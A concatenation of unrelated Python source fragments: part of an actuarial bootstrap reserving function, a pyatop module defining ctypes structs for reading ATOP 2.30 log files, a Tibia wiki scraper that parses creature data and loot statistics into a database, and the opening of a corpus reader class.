    dffcst = dffcst.drop(labels=["samp_cum", "samp_incr"], axis=1).rename(columns={"cum_final":"samp_cum"})
    dfsqrd = pd.concat([dffcst, dfacts], sort=True).sort_values(by=["sim", "origin", "dev"])
    # First development period keeps its cumulative value as the increment;
    # later periods take the within-(sim, origin) difference.
    dfsqrd["_dev1_ind"] = (dfsqrd["dev"].values==1) * 1
    dfsqrd["_incr_dev1"] = dfsqrd["_dev1_ind"].values * dfsqrd["samp_cum"].values
    dfsqrd["_incr_dev2"] = dfsqrd.groupby(["sim", "origin"])["samp_cum"].diff(periods=1)
    dfsqrd["_incr_dev2"] = np.where(np.isnan(dfsqrd["_incr_dev2"].values), 0, dfsqrd["_incr_dev2"].values)
    dfsqrd["samp_incr"] = dfsqrd["_incr_dev1"].values + dfsqrd["_incr_dev2"].values
    # Variance for the process-error stage: |mean| * scale_param, with the
    # sign of the increment carried separately.
    dfsqrd["var"] = np.abs(dfsqrd["samp_incr"].values * scale_param)
    dfsqrd["sign"] = np.where(dfsqrd["samp_incr"].values > 0, 1, -1)
    dfsqrd = dfsqrd.drop(labels=[i for i in dfsqrd.columns if i.startswith("_")], axis=1)
    return(dfsqrd.sort_values(by=["sim", "origin", "dev"]).reset_index(drop=True))
@staticmethod
def _bs_process_error(dfforecasts, scale_param, procdist="gamma", random_state=None):
"""
Incorporate process error by simulating each incremental future
loss from ``procdist``. The mean is set to the forecast incremental
loss amount and variance to `mean * self.scale_param`.
The parameters for ``procdist`` must be positive. Since the mean
and variance used to parameterize ``procdist`` depend on the
resampled incremental losses, it is necessary to incorporate logic
to address the possibility of negative incremental losses arising
in the resampling stage. The approach used to handle negative
incremental values is described in Shapland[1], and replaces the
distribution mean with the absolute value of the mean, and the
variance to the absolute value of the mean multiplied by
``self.scale_param``.
Parameters
----------
forecasts: pd.DataFrame
DateFrame of bootstraps forecasts generated within
``self._bs_forecasts``.
scale_param: float
the sum of the squared unscaled Pearson residuals over the
degrees of freedom. Computed within ``self._scale_param``.
procdist: str
Specifies the distribution used to incorporate process error.
Currently, can only be set to "gamma". Any other distribution
will result in an error. Future release will also allow
over-dispersed poisson ("odp"). If in the future ``procdist``
is set | |
"""Structs and definitions used serialize/deserialize ATOP statistics directly from log files.
Structs are declared in a way that will help provide as close to a 1 to 1 match as possible for debuggability
and maintenance. The _fields_ of every struct match their original name, however the struct names have been updated
to match python CamelCase standards. Each struct includes the following to help identify the original source:
C Name: utsname
C Location: sys/utsname.h
Struct ordering and visual whitespace in the _fields_ are left to help match the original source in readability.
If structs match exactly from a previous version, they are reused via aliasing.
See https://github.com/Atoptool/atop for more information and references to the C process source code.
Using schemas and structs from ATOP 2.30.
"""
import ctypes
from pyatop.structs import atop_126
# Disable the following pylint warnings to allow the variables and classes to match the style from the C.
# This helps with maintainability and cross-referencing.
# pylint: disable=invalid-name,too-few-public-methods
# Definitions from time.h
time_t = ctypes.c_long
# Definitions from atop.h
count_t = ctypes.c_longlong
# Bit-mask constants — presumably tested against Header.supportflags /
# Record.flags; TODO confirm against the atop C source before relying on them.
ACCTACTIVE = 0x00000001
PATCHSTAT = 0x00000002
IOSTAT = 0x00000004
PATCHACCT = 0x00000008
# Definitions from sys/types.h
off_t = ctypes.c_long
# Definitions from photoproc.h
PNAMLEN = 15
CMDLEN = 255
# Definitions from photosyst.h
# Fixed array capacities used by the per-subsystem structs below; they must
# match the C constants exactly since they size the binary layout.
MAXCPU = 2048
MAXDSK = 1024
MAXLVM = 2048
MAXMDD = 256
MAXINTF = 128
MAXCONTAINER = 128
MAXNFSMOUNT = 64
MAXDKNAM = 32
# Unchanged since atop 1.26; reused via aliasing (see module docstring).
UTSName = atop_126.UTSName
class Header(ctypes.Structure):
    """Top level struct to describe information about the system running ATOP and the log file itself.

    Field descriptions from atop:
        aversion   Creator atop version with MSB.
        future1    Can be reused.
        future2    Can be reused.
        rawheadlen Length of struct rawheader.
        rawreclen  Length of struct rawrecord.
        hertz      Clock interrupts per second.
        sfuture[6] Future use.
        sstatlen   Length of struct sstat.
        tstatlen   Length of struct tstat.
        utsname    Info about this system.

    C Name: rawheader
    C Location: rawlog.c
    """

    # Field order and types define the binary layout read from the log;
    # they must match the C struct exactly.
    _fields_ = [
        ('magic', ctypes.c_uint),
        ('aversion', ctypes.c_ushort),
        ('future1', ctypes.c_ushort),
        ('future2', ctypes.c_ushort),
        ('rawheadlen', ctypes.c_ushort),
        ('rawreclen', ctypes.c_ushort),
        ('hertz', ctypes.c_ushort),
        ('sfuture', ctypes.c_ushort * 6),
        ('sstatlen', ctypes.c_uint),
        ('tstatlen', ctypes.c_uint),
        ('utsname', UTSName),
        ('cfuture', ctypes.c_char * 8),
        ('pagesize', ctypes.c_uint),
        ('supportflags', ctypes.c_int),
        ('osrel', ctypes.c_int),
        ('osvers', ctypes.c_int),
        ('ossub', ctypes.c_int),
        ('ifuture', ctypes.c_int * 6),
    ]

    def check_compatibility(self) -> None:
        """Verify if the loaded values are compatible with this header version.

        Raises:
            ValueError if not compatible.
        """
        # Compatibility is judged purely on struct sizes: if any C struct
        # length recorded in the log differs from these ctypes definitions,
        # the log was written by an incompatible atop build.
        compatible = [
            self.sstatlen == ctypes.sizeof(SStat),
            self.tstatlen == ctypes.sizeof(TStat),
            self.rawheadlen == ctypes.sizeof(Header),
            self.rawreclen == ctypes.sizeof(Record),
        ]
        if not all(compatible):
            raise ValueError(f'File has incompatible atop format. Struct length evaluations: {compatible}')

    def get_version(self) -> float:
        """Convert the raw version into a semantic version.

        Returns:
            version: The final major.minor version from the header aversion.
        """
        # The MSB of aversion is a flag (see the docstring above), so mask
        # it off the high byte; the low byte carries the minor version.
        major = (self.aversion >> 8) & 0x7f
        minor = self.aversion & 0xff
        # NOTE(review): float('2.30') == 2.3, so minors with trailing zeros
        # collapse (2.3 vs 2.30 become indistinguishable) — confirm intended.
        version = float(f'{major}.{minor}')
        return version
class Record(ctypes.Structure):
    """Top level struct to describe basic process information, and the following SStat and TStat structs.

    Field descriptions from atop:
        curtime    Current time (epoch).
        flags      Various flags.
        sfuture[3] Future use.
        scomplen   Length of compressed sstat.
        pcomplen   Length of compressed tstats.
        interval   Interval (number of seconds).
        ndeviat    Number of tasks in list.
        nactproc   Number of processes in list.
        ntask      Total number of tasks.
        totproc    Total number of processes.
        totrun     Number of running threads.
        totslpi    Number of sleeping threads(S).
        totslpu    Number of sleeping threads(D).
        totzomb    Number of zombie processes.
        nexit      Number of exited processes.
        noverflow  Number of overflow processes.
        ifuture[6] Future use.

    C Name: rawrecord
    C Location: rawlog.c
    """

    # Field order and types define the binary layout read from the log;
    # they must match the C struct exactly.
    _fields_ = [
        ('curtime', time_t),
        ('flags', ctypes.c_ushort),
        ('sfuture', ctypes.c_ushort * 3),
        ('scomplen', ctypes.c_uint),
        ('pcomplen', ctypes.c_uint),
        ('interval', ctypes.c_uint),
        ('ndeviat', ctypes.c_uint),
        ('nactproc', ctypes.c_uint),
        ('ntask', ctypes.c_uint),
        ('totproc', ctypes.c_uint),
        ('totrun', ctypes.c_uint),
        ('totslpi', ctypes.c_uint),
        ('totslpu', ctypes.c_uint),
        ('totzomb', ctypes.c_uint),
        ('nexit', ctypes.c_uint),
        ('noverflow', ctypes.c_uint),
        ('ifuture', ctypes.c_uint * 6),
    ]
class MemStat(ctypes.Structure):
    """Embedded struct to describe basic memory information.

    C Name: memstat
    C Location: photosyst.h
    C Parent: sstat
    """

    # All counters use atop's count_t (long long). Units are whatever the C
    # source records — presumably pages for most fields; TODO confirm.
    _fields_ = [
        ('physmem', count_t),
        ('freemem', count_t),
        ('buffermem', count_t),
        ('slabmem', count_t),
        ('cachemem', count_t),
        ('cachedrt', count_t),
        ('totswap', count_t),
        ('freeswap', count_t),
        ('pgscans', count_t),
        ('pgsteal', count_t),
        ('allocstall', count_t),
        ('swouts', count_t),
        ('swins', count_t),
        ('commitlim', count_t),
        ('committed', count_t),
        ('shmem', count_t),
        ('shmrss', count_t),
        ('shmswp', count_t),
        ('slabreclaim', count_t),
        ('tothugepage', count_t),
        ('freehugepage', count_t),
        ('hugepagesz', count_t),
        ('vmwballoon', count_t),
        ('cfuture', count_t * 8),
    ]
# Unchanged since atop 1.26; reused via aliasing (see module docstring).
FreqCnt = atop_126.FreqCnt
class PerCPU(ctypes.Structure):
    """Embedded struct to describe per processor usage information.

    C Name: percpu
    C Location: photosyst.h
    C Parent: cpustat
    """

    # Field order and types must match the C struct; note the separate
    # lowercase 'itime' and capitalized 'Itime'/'Stime' counters.
    _fields_ = [
        ('cpunr', ctypes.c_int),
        ('stime', count_t),
        ('utime', count_t),
        ('ntime', count_t),
        ('itime', count_t),
        ('wtime', count_t),
        ('Itime', count_t),
        ('Stime', count_t),
        ('steal', count_t),
        ('guest', count_t),
        ('freqcnt', FreqCnt),
        ('cfuture', count_t * 4),
    ]
class CPUStat(ctypes.Structure):
    """Embedded struct to describe basic overall processor information.

    C Name: cpustat
    C Location: photosyst.h
    C Parent: sstat
    """

    # 'all' aggregates across processors; 'cpu' is a fixed-size array of
    # per-processor entries of which only the first nrcpu are meaningful.
    _fields_ = [
        ('nrcpu', count_t),
        ('devint', count_t),
        ('csw', count_t),
        ('nprocs', count_t),
        ('lavg1', ctypes.c_float),
        ('lavg5', ctypes.c_float),
        ('lavg15', ctypes.c_float),
        ('cfuture', count_t * 4),
        ('all', PerCPU),
        ('cpu', PerCPU * MAXCPU)
    ]
class PerDSK(ctypes.Structure):
    """Embedded struct to describe per disk information.

    C Name: perdsk
    C Location: photosyst.h
    C Parent: dskstat
    """

    # Field order and types must match the C struct exactly; they define
    # the binary layout parsed from the log.
    _fields_ = [
        ('name', ctypes.c_char * MAXDKNAM),
        ('nread', count_t),
        ('nrsect', count_t),
        ('nwrite', count_t),
        ('nwsect', count_t),
        ('io_ms', count_t),
        ('avque', count_t),
        ('cfuture', count_t * 4),
    ]
class DSKStat(ctypes.Structure):
    """Embedded struct to describe overall disk information.

    C Name: dskstat
    C Location: photosyst.h
    C Parent: sstat
    """

    # The dsk/mdd/lvm arrays are fixed-capacity; only the first
    # ndsk/nmdd/nlvm entries of each are meaningful.
    _fields_ = [
        ('ndsk', ctypes.c_int),
        ('nmdd', ctypes.c_int),
        ('nlvm', ctypes.c_int),
        ('dsk', PerDSK * MAXDSK),
        ('mdd', PerDSK * MAXMDD),
        ('lvm', PerDSK * MAXLVM),
    ]
class PerIntf(ctypes.Structure):
    """Embedded struct to describe per interface statistics.

    C Name: perintf
    C Location: photosyst.h
    C Parent: intfstat
    """

    # r* fields are receive counters, s* fields are send counters; order
    # and types must match the C struct exactly.
    _fields_ = [
        ('name', ctypes.c_char * 16),
        ('rbyte', count_t),
        ('rpack', count_t),
        ('rerrs', count_t),
        ('rdrop', count_t),
        ('rfifo', count_t),
        ('rframe', count_t),
        ('rcompr', count_t),
        ('rmultic', count_t),
        ('rfuture', count_t * 4),
        ('sbyte', count_t),
        ('spack', count_t),
        ('serrs', count_t),
        ('sdrop', count_t),
        ('sfifo', count_t),
        ('scollis', count_t),
        ('scarrier', count_t),
        ('scompr', count_t),
        ('sfuture', count_t * 4),
        ('type', ctypes.c_char),
        ('speed', ctypes.c_long),
        ('speedp', ctypes.c_long),
        ('duplex', ctypes.c_char),
        ('cfuture', count_t * 4),
    ]
class IntfStat(ctypes.Structure):
    """Embedded struct to describe overall interface statistics.

    C Name: intfstat
    C Location: photosyst.h
    C Parent: sstat
    """

    # Only the first nrintf entries of the fixed-capacity array are meaningful.
    _fields_ = [
        ('nrintf', ctypes.c_int),
        ('intf', PerIntf * MAXINTF),
    ]
class PerNFSMount(ctypes.Structure):
    """Embedded struct to describe per NFS mount statistics.

    C Name: pernfsmount
    C Location: photosyst.h
    C Parent: nfsmounts
    """

    # Field order and types must match the C struct exactly; they define
    # the binary layout parsed from the log.
    _fields_ = [
        ('name', ctypes.c_char * 128),
        ('age', count_t),
        ('bytesread', count_t),
        ('byteswrite', count_t),
        ('bytesdread', count_t),
        ('bytesdwrite', count_t),
        ('bytestotread', count_t),
        ('bytestotwrite', count_t),
        ('pagesmread', count_t),
        ('pagesmwrite', count_t),
        ('future', count_t * 8),
    ]
class Server(ctypes.Structure):
    """Embedded struct to describe NFS server information from the 'NFS' parseable.

    C Name: server
    C Location: photoproc.h
    C Parent: nfsstat
    """

    # NOTE(review): the stated C location (photoproc.h) looks inconsistent
    # with the nfsstat parent living in photosyst.h — confirm against atop.
    _fields_ = [
        ('netcnt', count_t),
        ('netudpcnt', count_t),
        ('nettcpcnt', count_t),
        ('nettcpcon', count_t),
        ('rpccnt', count_t),
        ('rpcbadfmt', count_t),
        ('rpcbadaut', count_t),
        ('rpcbadcln', count_t),
        ('rpcread', count_t),
        ('rpcwrite', count_t),
        ('rchits', count_t),
        ('rcmiss', count_t),
        ('rcnoca', count_t),
        ('nrbytes', count_t),
        ('nwbytes', count_t),
        ('future', count_t * 8),
    ]
class Client(ctypes.Structure):
    """Embedded struct to describe NFS client information from the 'NFC' parseable.

    C Name: client
    C Location: photoproc.h
    C Parent: nfsstat
    """

    # Field order and types must match the C struct exactly; they define
    # the binary layout parsed from the log.
    _fields_ = [
        ('rpccnt', count_t),
        ('rpcretrans', count_t),
        ('rpcautrefresh', count_t),
        ('rpcread', count_t),
        ('rpcwrite', count_t),
        ('future', count_t * 8),
    ]
class NFSMounts(ctypes.Structure):
    """Embedded struct to describe NFS mount information from the 'NFM' parseable.

    C Name: mfsmounts
    C Location: photoproc.h
    C Parent: nfsstat
    """

    # NOTE(review): docstring lists C name "mfsmounts"; the atop source is
    # believed to call this struct "nfsmounts" — confirm (likely a typo).
    # Only the first nrmounts entries of the fixed-capacity array are used.
    _fields_ = [
        ('nrmounts', ctypes.c_int),
        ('pernfsmount', PerNFSMount * MAXNFSMOUNT)
    ]
class NFSStat(ctypes.Structure):
    """Embedded struct to describe NFS subsystem.

    C Name: nfstat
    C Location: photosyst.h
    C Parent: sstat
    """

    # Aggregates the NFS server, client and mount sub-structs in C order.
    _fields_ = [
        ('server', Server),
        ('client', Client),
        ('nfsmounts', NFSMounts),
    ]
class PerContainer(ctypes.Structure):
    """Embedded struct to describe per container statistics.

    C Name: percontainer
    C Location: photosyst.h
    C Parent: constat
    """

    # Field order and types must match the C struct exactly; they define
    # the binary layout parsed from the log.
    _fields_ = [
        ('ctid', ctypes.c_ulong),
        ('numproc', ctypes.c_ulong),
        ('system', count_t),
        ('user', count_t),
        ('nice', count_t),
        ('uptime', count_t),
        ('physpages', count_t),
    ]
class ContStat(ctypes.Structure):
"""Embedded struct to describe container subsystem.
C Name: contstat
C Location: photosyst.h
C Parent: sstat
"""
_fields_ = [
('nrcontainer', ctypes.c_int),
('cont', PerContainer * MAXCONTAINER),
]
WWWStat = atop_126.WWWStat
IPv4Stats = atop_126.IPv4Stats
ICMPv4Stats = atop_126.ICMPv4Stats
UDPv4Stats = atop_126.UDPv4Stats
TCPStats = atop_126.TCPStats
IPv6Stats = atop_126.IPv6Stats
ICMPv6Stats = atop_126.ICMPv6Stats
UDPv6Stats = atop_126.UDPv6Stats
NETStat = atop_126.NETStat
class SStat(ctypes.Structure):
"""Top level struct to describe various subsystems.
C Name: sstat
C Location: photosyst.h
"""
_fields_ = [
('cpu', CPUStat),
('mem', MemStat),
('net', NETStat),
('intf', IntfStat),
('dsk', DSKStat),
('nfs', NFSStat),
('cfs', ContStat),
('www', WWWStat),
]
class GEN(ctypes.Structure):
"""Embedded struct to describe a single process' general information from the 'GEN' parseable.
C Name: gen
C Location: photoproc.h
C Parent: tstat
"""
_fields_ = [
('tgid', ctypes.c_int),
('pid', ctypes.c_int),
('ppid', ctypes.c_int),
('ruid', ctypes.c_int),
('euid', ctypes.c_int),
('suid', ctypes.c_int),
('fsuid', | |
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from urlhelpers import getFeaturedImageUrl
from parseattribs import parseLoot
from format import formatTitle
# Matches an integer that may use ',' or '.' as thousands separators
# (e.g. "1,000,000" or "1.000.000"); group 1 captures the whole number.
numberRegex = re.compile('([0-9]+[,.]?[0-9]*[,.]?[0-9]*[,.]?[0-9]*[,.]?[0-9]*)')
def getBoolean(attributes, attrib, default=False):
    """Read *attrib* from *attributes* as a yes/no flag.

    Returns *default* when the key is missing; otherwise True exactly when
    the value equals 'yes' after stripping whitespace and lower-casing.
    """
    try:
        raw = attributes[attrib]
    except KeyError:
        return default
    return raw.strip().lower() == 'yes'
def getInteger(attributes, attrib):
    """Return the first integer found in attributes[attrib], or None.

    Thousands separators (',' or '.') are stripped, so '1,234' -> 1234.
    Returns None when the key is missing or its value contains no number.
    """
    if attrib not in attributes:
        return None
    # numberRegex is the module-level separator-aware integer pattern.
    match = numberRegex.search(attributes[attrib])
    # Fix: compare against None with 'is not', not '!=' (identity idiom).
    if match is not None:
        return int(match.group(1).replace(',', '').replace('.', ''))
    return None
def getMaxInteger(attributes, attrib):
    """Return the largest integer found in attributes[attrib], or None.

    Every number in the value is considered; thousands separators
    (',' or '.') are stripped before comparison.  Returns None when the
    key is missing or the value contains no number.
    """
    if attrib not in attributes:
        return None
    # Fix: replace the manual '== None' accumulator loop with max() over a
    # comprehension (same result, idiomatic, no identity-comparison smell).
    values = [int(s.replace(',', '').replace('.', ''))
              for s in numberRegex.findall(attributes[attrib])]
    return max(values) if values else None
# Normalisation map from wiki item names (plural/irregular forms) to the
# canonical item name used in the database.  Identity entries are kept on
# purpose: filterItemName() only rewrites names that appear here.
itemmap = {
    'sais': 'sai',
    'gold coins': 'gold coin',
    'platinum coins': 'platinum coin',
    'rusty armor': 'rusty armor',
    'clusters of solace': 'cluster of solace',
    'the lethal lissy\'s shirt': 'lethal lissy\'s shirt',
    'music sheet': 'music sheet',
    'picture': 'picture',
    'part of a jester doll': 'part of a jester doll',
}
# Start of a sortable loot table on a "Loot Statistics" wiki page.
lootListRegex = re.compile('<table class="loot_list sortable">')
# First cell of a loot row: captures the wiki path of the dropped item.
wikiURLRegex = re.compile('<td><a href="/wiki/([^"]+)"')
# Everything before the first '?' (drops query-string leftovers from names).
questionMarkRegex = re.compile('([^?]*)')
# A percentage such as "12.5%"; group 1 is the numeric part.
lootChanceRegex = re.compile('([0-9]+(?:[.][0-9]+)?)[%]')
# Any HTML tag (used to strip markup).
abilityRegex = re.compile('<[^>]*>')
# A "min-max" drop-count table cell, e.g. "1-4".
lootCountRegex = re.compile('<td class="loot_list_no_border">([0-9]+)[-]([0-9]+)</td>')
def filterItemName(item_name):
    """Normalise a wiki URL path (as captured by wikiURLRegex) to a
    canonical lower-case item name.

    Steps: remove a literal '/wiki/' prefix, decode '_', '%27' and
    '%C3%B1', lower-case, drop parenthesised qualifiers and query-string
    leftovers, then map plural/irregular names through itemmap.
    """
    # BUGFIX: the original used lstrip('/wiki/'), which strips the CHARACTER
    # SET {'/', 'w', 'i', 'k'} from the left rather than the prefix, so a
    # name starting with one of those letters could be mangled.  Remove the
    # exact prefix instead.
    if item_name.startswith('/wiki/'):
        item_name = item_name[len('/wiki/'):]
    item_name = item_name.replace('_', ' ').replace('%27', '\'').replace('%C3%B1', 'n').lower()
    item_name = re.sub(r' \([^(]*\)', '', item_name).strip()  # remove parenthesis
    match = questionMarkRegex.search(item_name)
    item_name = match.groups()[0]
    if item_name in itemmap:
        item_name = itemmap[item_name]
    return item_name
# Page titles skipped entirely by parseCreature(): not real creatures
# (quest areas / special rooms).
passList = ['Liberty Bay Fortress', 'Kraknaknork\'s Dimension', 'Snow White Room', 'Glooth']
def parseCreature(title, attributes, c, creaturedrops, getURL, parseImage = False):
if title in passList:
return False
name = title
if 'actualname' in attributes and len(attributes['actualname']) > 0:
name = formatTitle(attributes['actualname'])
elif 'name' in attributes and len(attributes['name']) > 0:
name = formatTitle(attributes['name'])
hp = getInteger(attributes, 'hp')
exp = None
if 'exp' in attributes:
try: exp = int(attributes['exp'])
except: pass
summon = None
if 'summon' in attributes:
try: summon = int(attributes['summon'])
except: pass
convince = None
if 'convince' in attributes:
try: convince = int(attributes['convince'])
except: pass
bestiaryname = None
if 'bestiaryname' in attributes:
bestiaryname = attributes['bestiaryname']
bestiarytext = None
if 'bestiarytext' in attributes:
bestiarytext = attributes['bestiarytext']
bestiarylevel = None
if 'bestiarylevel' in attributes:
bestiarylevel = attributes['bestiarylevel']
occurrence = None
if 'occurrence' in attributes:
occurrence = attributes['occurrence']
sounds = None
if 'sounds' in attributes:
sounds = attributes['sounds']
location = None
if 'location' in attributes:
location = attributes['location']
implemented = None
if 'implemented' in attributes:
implemented = attributes['implemented']
illusionable = getBoolean(attributes,'illusionable')
pushable = getBoolean(attributes,'pushable')
pushes = getBoolean(attributes,'pushes')
paralysable = getBoolean(attributes,'paraimmune')
senseinvis = getBoolean(attributes,'senseinvis', True)
armor = getInteger(attributes,'armor')
maxdmg = getMaxInteger(attributes,'maxdmg')
physical = getInteger(attributes,'physicalDmgMod')
holy = getInteger(attributes,'holyDmgMod')
heal = getInteger(attributes,'healMod')
death = getInteger(attributes,'deathDmgMod')
fire = getInteger(attributes,'fireDmgMod')
energy = getInteger(attributes,'energyDmgMod')
ice = getInteger(attributes,'iceDmgMod')
earth = getInteger(attributes,'earthDmgMod')
drown = getInteger(attributes,'drownDmgMod')
lifedrain = getInteger(attributes,'hpDrainDmgMod')
speed = getInteger(attributes,'speed')
runsat = getInteger(attributes,'runsat')
boss = False
if 'isboss' in attributes and attributes['isboss'].lower().strip() == 'yes':
boss = True
notes = None
if 'notes' in attributes:
# first take care of [[Fire Rune||Great Fireball]] => Great Fireball
b = re.sub(r'\[\[[^]|]+\|([^]]+)\]\]', '\g<1>', attributes['notes'])
# then take care of [[Fire Rune]] => Fire Rune
b = re.sub(r'\[\[([^]]+)\]\]', '\g<1>', b)
# sometimes there are links in single brackets [http:www.link.com] => remove them
b = re.sub(r'\[[^]]+\]', '', b)
# if there are brackets without numbers, remove them (maybe not necessary)
b = re.sub(r'\(([^0-9]+)\)', '', b)
# replace double spaces with single spaces
b = b.replace(' ', ' ')
# if there are commas in brackets (300-500, Fire Damage) => replace the comma with a semicolon (for later splitting purposes)
notes = re.sub(r'(\([^,)]+)\,([^)]+\))', '\g<1>;\g<2>', b)
abilities = None
if 'abilities' in attributes:
# first take care of [[Fire Rune||Great Fireball]] => Great Fireball
b = re.sub(r'\[\[[^]|]+\|([^]]+)\]\]', '\g<1>', attributes['abilities'])
# then take care of [[Fire Rune]] => Fire Rune
b = re.sub(r'\[\[([^]]+)\]\]', '\g<1>', b)
# sometimes there are links in single brackets [http:www.link.com] => remove them
b = re.sub(r'\[[^]]+\]', '', b)
# if there are brackets without numbers, remove them (maybe not necessary)
b = re.sub(r'\(([^0-9]+)\)', '', b)
# replace double spaces with single spaces
b = b.replace(' ', ' ')
# if there are commas in brackets (300-500, Fire Damage) => replace the comma with a semicolon (for later splitting purposes)
abilities = re.sub(r'(\([^,)]+)\,([^)]+\))', '\g<1>;\g<2>', b)
strategy = None
if 'strategy' in attributes:
# first take care of [[Fire Rune||Great Fireball]] => Great Fireball
b = re.sub(r'\[\[[^]|]+\|([^]]+)\]\]', '\g<1>', attributes['strategy'])
# then take care of [[Fire Rune]] => Fire Rune
b = re.sub(r'\[\[([^]]+)\]\]', '\g<1>', b)
# sometimes there are links in single brackets [http:www.link.com] => remove them
b = re.sub(r'\[[^]]+\]', '', b)
# if there are brackets without numbers, remove them (maybe not necessary)
b = re.sub(r'\(([^0-9]+)\)', '', b)
# replace double spaces with single spaces
b = b.replace(' ', ' ')
# if there are commas in brackets (300-500, Fire Damage) => replace the comma with a semicolon (for later splitting purposes)
strategy = re.sub(r'(\([^,)]+)\,([^)]+\))', '\g<1>;\g<2>', b)
behaviour = None
if 'behaviour' in attributes:
# first take care of [[Fire Rune||Great Fireball]] => Great Fireball
b = re.sub(r'\[\[[^]|]+\|([^]]+)\]\]', '\g<1>', attributes['behaviour'])
# then take care of [[Fire Rune]] => Fire Rune
b = re.sub(r'\[\[([^]]+)\]\]', '\g<1>', b)
# sometimes there are links in single brackets [http:www.link.com] => remove them
b = re.sub(r'\[[^]]+\]', '', b)
# if there are brackets without numbers, remove them (maybe not necessary)
b = re.sub(r'\(([^0-9]+)\)', '', b)
# replace double spaces with single spaces
b = b.replace(' ', ' ')
# if there are commas in brackets (300-500, Fire Damage) => replace the comma with a semicolon (for later splitting purposes)
behaviour = re.sub(r'(\([^,)]+)\,([^)]+\))', '\g<1>;\g<2>', b)
image = None
itemHTML = ''
if parseImage:
url = "https://tibia.fandom.com/wiki/%s" % (title.replace(' ', '_'))
itemHTML = getURL(url, True)
if itemHTML:
image = getFeaturedImageUrl(url, itemHTML)
if image == None or image == False:
print('Failed to get image of creature', title)
# add stuff to database
c.execute('INSERT INTO Creatures (title, name, health_points, xp_points, max_damage, summon_mana, is_illusionable, is_pushable, pushes, element_physical, element_holy, element_death, element_fire, element_energy, element_ice, element_earth, element_drown, element_lifedrain, is_paralysable, senses_invis, wiki_image_url, abilities, speed, armor, is_boss, notes, strategy, behaviour, convince_mana, bestiary_name, bestiary_text, bestiary_level, occurrence, element_heal, runs_at, sounds, location, implemented) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)',
(title, name, hp, exp, maxdmg, summon, illusionable, pushable, pushes, physical, holy, death, fire, energy, ice, earth, drown, lifedrain, paralysable, senseinvis, image, abilities, speed, armor, boss, notes, strategy, behaviour, convince, bestiaryname, bestiarytext, bestiarylevel, occurrence, heal, runsat, sounds, location, implemented))
creatureid = c.lastrowid
creaturedrops[creatureid] = dict()
# for some reason loot statistics are not in the xml file, so we get it from the website
url = 'http://tibia.fandom.com/wiki/Loot_Statistics:%s' % title.replace(' ','_')
stats = getURL(url, True)
if stats != None:
loot_stats = list()
current_index = 0
while True:
match = lootListRegex.search(stats[current_index:])
if match == None: break
index = match.end()
match = lootListRegex.search(stats[current_index + index:])
if match == None: endindex = len(stats) - current_index
else: endindex = index + match.start()
kill_count = 0
match = re.search('([0-9]+) kills', stats[current_index + index:current_index + endindex])
if match != None: kill_count = int(match.groups()[0])
list.append(loot_stats, [current_index + index, current_index + endindex, kill_count])
current_index = current_index + endindex
lootdrops = dict()
killcount = dict()
score = dict()
for i in range(len(loot_stats)):
index = loot_stats[i][0]
endindex = loot_stats[i][1]
kills = loot_stats[i][2]
lootdrops[i] = dict()
killcount[i] = kills
bag = False
highpercentage = False
while True:
match = wikiURLRegex.search(stats[index:endindex])
if match == None: break
item_name = filterItemName(match.groups()[0]).lower()
# creatures don't drop bags, but they used to in the past
# if there is a bag in the creature kills, we know it's old
startindex = index
index = index + match.end()
if index > endindex or item_name == "loot": break
match = lootCountRegex.search(stats[startindex:index])
if match == None:
mindrop = 1
maxdrop = 1
else:
mindrop = int(match.groups()[0])
maxdrop = int(match.groups()[1])
match | |
<filename>zas_rep_tools/src/classes/reader.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# : XXX{Information about this code}XXX
# Author:
# c(Developer) -> {'<NAME>'}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###Programm Info######
#
#
#
#
#
from __future__ import division
from __future__ import absolute_import
import os
import copy
import sys
import regex
import logging
import codecs
import json
import csv
import unicodecsv as unicodecsv
from lxml import etree as ET
import psutil
import zipfile
import cStringIO
import json
import StringIO
#zipfile.ZipExtFile
from collections import defaultdict
from raven import Client
#from cached_property import cached_property
from encodings.aliases import aliases
from decimal import Decimal, ROUND_HALF_UP, ROUND_UP, ROUND_HALF_DOWN, ROUND_DOWN
#from zas_rep_tools.src.utils.db_helper import *
#from zas_rep_tools.src.classes.configer import Configer
from zas_rep_tools.src.utils.helpers import set_class_mode, print_mode_name, LenGen, path_to_zas_rep_tools, get_number_of_streams_adjust_cpu, instance_info, SharedCounterExtern, SharedCounterIntern, Status, function_name,statusesTstring
#from zas_rep_tools.src.utils.logger import *
from zas_rep_tools.src.utils.zaslogger import ZASLogger
from zas_rep_tools.src.utils.debugger import p
from zas_rep_tools.src.utils.error_tracking import initialisation
from zas_rep_tools.src.utils.helpers import get_file_list
from zas_rep_tools.src.utils.traceback_helpers import print_exc_plus
from zas_rep_tools.src.classes.basecontent import BaseContent
import platform
if platform.uname()[0].lower() !="windows":
import colored_traceback
colored_traceback.add_hook()
else:
import colorama
csv.field_size_limit(sys.maxsize)
class Reader(BaseContent):
    """Streams rows out of txt/json/xml/csv corpora (optionally from inside
    zip archives) and hands them to the rest of the zas_rep_tools pipeline.

    NOTE(review): this module is Python 2 code ('except Exception, e',
    unicode, iteritems); keep any edits Python-2 compatible.
    """
    #supported_encodings_types = ["utf-8"]
    # Every canonical codec name known to the interpreter, plus 'utf-8'
    # itself (aliases.values() only contains spellings such as 'utf_8').
    supported_encodings_types = set(aliases.values())
    supported_encodings_types.add("utf-8")
    supported_file_types = ["txt", "json", "xml", "csv"]
    supported_file_types_to_export = ["sqlite", "json", "xml", "csv"]
    # Named filename-pattern templates selectable via 'regex_template';
